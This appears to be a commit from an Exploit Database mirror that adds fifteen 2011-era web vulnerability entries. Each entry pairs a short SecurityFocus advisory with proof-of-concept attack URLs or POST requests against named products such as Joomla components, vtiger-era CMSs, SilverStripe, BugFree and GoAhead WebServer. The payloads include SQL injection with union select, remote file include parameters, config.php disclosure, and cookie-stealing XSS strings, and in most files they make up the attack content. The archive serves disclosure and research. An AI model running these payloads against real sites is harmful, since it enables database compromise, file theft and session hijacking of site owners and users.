Update: 2015-03-03
15 new exploits
This commit is contained in:
parent
0853b7e8a4
commit
9eca9a0b50
16 changed files with 191 additions and 0 deletions
15
files.csv
15
files.csv
|
@ -32639,3 +32639,18 @@ id,file,description,date,author,platform,type,port
|
||||||
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
|
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
|
||||||
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
|
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
|
||||||
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0
|
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0
|
||||||
|
36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 'resolute.php' Information Disclosure Vulnerability",2011-10-07,"cr4wl3r ",php,webapps,0
|
||||||
|
36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Vulnerability",2011-10-09,"BHG Security Center",php,webapps,0
|
||||||
|
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 Multiple Remote File Include Vulnerabilities",2011-10-10,indoushka,php,webapps,0
|
||||||
|
36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0
|
||||||
|
36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 addlimit.asp url Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0
|
||||||
|
36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 adduser.asp Multiple Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0
|
||||||
|
36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component 'key' Parameter SQL Injection Vulnerability",2011-10-11,CoBRa_21,php,webapps,0
|
||||||
|
36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component 'state_id' Parameter SQL Injection Vulnerability",2011-10-11,CoBRa_21,php,webapps,0
|
||||||
|
36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component 'id' Parameter SQL Injection Vulnerability",2011-10-11,CoBRa_21,php,webapps,0
|
||||||
|
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 Multiple Remote File Include Vulnerabilities",2011-10-11,indoushka,php,webapps,0
|
||||||
|
36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-10-10,"labs insight",php,webapps,0
|
||||||
|
36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting Vulnerability",2011-10-02,"Stefan Schurtz",php,webapps,0
|
||||||
|
36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
|
||||||
|
36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0
|
||||||
|
36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
9
platforms/php/webapps/36214.txt
Executable file
9
platforms/php/webapps/36214.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50018/info
|
||||||
|
|
||||||
|
BuzzScripts BuzzyWall is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
|
||||||
|
|
||||||
|
An attacker can exploit this issue to download local files in the context of the webserver process. This may allow the attacker to obtain sensitive information; other attacks are also possible.
|
||||||
|
|
||||||
|
BuzzyWall 1.3.2 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/resolute.php?img=config.php
|
7
platforms/php/webapps/36215.txt
Executable file
7
platforms/php/webapps/36215.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50019/info
|
||||||
|
|
||||||
|
The 'com_expedition' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235'
|
13
platforms/php/webapps/36216.txt
Executable file
13
platforms/php/webapps/36216.txt
Executable file
|
@ -0,0 +1,13 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50022/info
|
||||||
|
|
||||||
|
Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
|
||||||
|
|
||||||
|
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
|
||||||
|
|
||||||
|
Jaws 0.8.14 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI]
|
||||||
|
http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI]
|
||||||
|
http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI]
|
||||||
|
http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI]
|
||||||
|
http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]
|
7
platforms/php/webapps/36220.txt
Executable file
7
platforms/php/webapps/36220.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50041/info
|
||||||
|
|
||||||
|
The 'com_tree' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2--
|
7
platforms/php/webapps/36221.txt
Executable file
7
platforms/php/webapps/36221.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50042/info
|
||||||
|
|
||||||
|
The 'com_br' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3
|
7
platforms/php/webapps/36222.txt
Executable file
7
platforms/php/webapps/36222.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50043/info
|
||||||
|
|
||||||
|
The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12
|
23
platforms/php/webapps/36223.txt
Executable file
23
platforms/php/webapps/36223.txt
Executable file
|
@ -0,0 +1,23 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50046/info
|
||||||
|
|
||||||
|
2Moons is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
|
||||||
|
|
||||||
|
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
|
||||||
|
|
||||||
|
2Moons 1.4 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/2Moons/CombatReport.php?RID=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/common.php?UNI=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?MissionsPattern[CurrentFleet[fleet_mission]]=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?CurrentFleet[fleet_mission]]=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.Lang.php?Lang=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.Lang.php?LANGUAGE=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/classes/class.Records.php?File=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/pages/ShowTopKB.php?ReportID=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/libs/Smarty/Smarty.class.php?file=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/pages/adm/ShowModVersionPage.php?File=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?_smarty_template=[EV!L]
|
||||||
|
http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L]
|
15
platforms/php/webapps/36224.txt
Executable file
15
platforms/php/webapps/36224.txt
Executable file
|
@ -0,0 +1,15 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50050/info
|
||||||
|
|
||||||
|
6KBBS is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
6KBBS 8.0 build 20101201 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/credits.php?'[XSS]
|
||||||
|
http://www.example.com/forum.php?'[XSS]
|
||||||
|
http://www.example.com/index.php?'[XSS]
|
||||||
|
http://www.example.com/login.php?'[XSS]
|
||||||
|
http://www.example.com/online.php?'[XSS]
|
||||||
|
http://www.example.com/getfiles.php?f=http://xxx&t=js
|
||||||
|
http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js
|
11
platforms/php/webapps/36225.txt
Executable file
11
platforms/php/webapps/36225.txt
Executable file
|
@ -0,0 +1,11 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50061/info
|
||||||
|
|
||||||
|
Contao is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
Contao 2.10.1 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
|
||||||
|
http://www.example.com/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>
|
||||||
|
|
22
platforms/php/webapps/36226.txt
Executable file
22
platforms/php/webapps/36226.txt
Executable file
|
@ -0,0 +1,22 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50063/info
|
||||||
|
|
||||||
|
SilverStripe is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||||
|
|
||||||
|
SilverStripe 2.4.5 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/reports/?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/comments/?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/4?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/2?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/root?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/3?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/assets/?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/1?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/show/5?'"</script><script>alert(document.cookie)</script>
|
||||||
|
http://www.example.com/SilverStripe-v2.4.5/admin/security/?'"</script><script>alert(document.cookie)</script>
|
||||||
|
|
||||||
|
|
9
platforms/php/webapps/36227.txt
Executable file
9
platforms/php/webapps/36227.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50072/info
|
||||||
|
|
||||||
|
The Sgicatalog component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
Sgicatalog 1.0 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
|
15
platforms/php/webapps/36228.txt
Executable file
15
platforms/php/webapps/36228.txt
Executable file
|
@ -0,0 +1,15 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50083/info
|
||||||
|
|
||||||
|
BugFree is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
|
||||||
|
|
||||||
|
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||||
|
|
||||||
|
BugFree 2.1.3 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
http://www.example.com/Report.php?ReportMode=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
http://www.example.com/ReportLeft.php?ReportMode=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
http://www.example.com/admin/AdminProjectList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
http://www.example.com/admin/AdminGroupList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
http://www.example.com/admin/AdminUserLogList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
|
10
platforms/windows/remote/36217.txt
Executable file
10
platforms/windows/remote/36217.txt
Executable file
|
@ -0,0 +1,10 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50039/info
|
||||||
|
|
||||||
|
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||||
|
|
||||||
|
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
POST /goform/AddGroup HTTP/1.1
|
||||||
|
group=<script>alert(1337)</script>&privilege=4&method=1&enabled=on&ok=OK
|
10
platforms/windows/remote/36218.txt
Executable file
10
platforms/windows/remote/36218.txt
Executable file
|
@ -0,0 +1,10 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50039/info
|
||||||
|
|
||||||
|
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||||
|
|
||||||
|
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
POST /goform/AddAccessLimit HTTP/1.1
|
||||||
|
url=<script>alert(1337)</script>&group=test&method=3&ok=OK
|
11
platforms/windows/remote/36219.txt
Executable file
11
platforms/windows/remote/36219.txt
Executable file
|
@ -0,0 +1,11 @@
|
||||||
|
source: http://www.securityfocus.com/bid/50039/info
|
||||||
|
|
||||||
|
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||||
|
|
||||||
|
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
POST /goform/AddUser HTTP/1.1
|
||||||
|
user=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%2
|
||||||
|
9%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK
|
Loading…
Add table
Reference in a new issue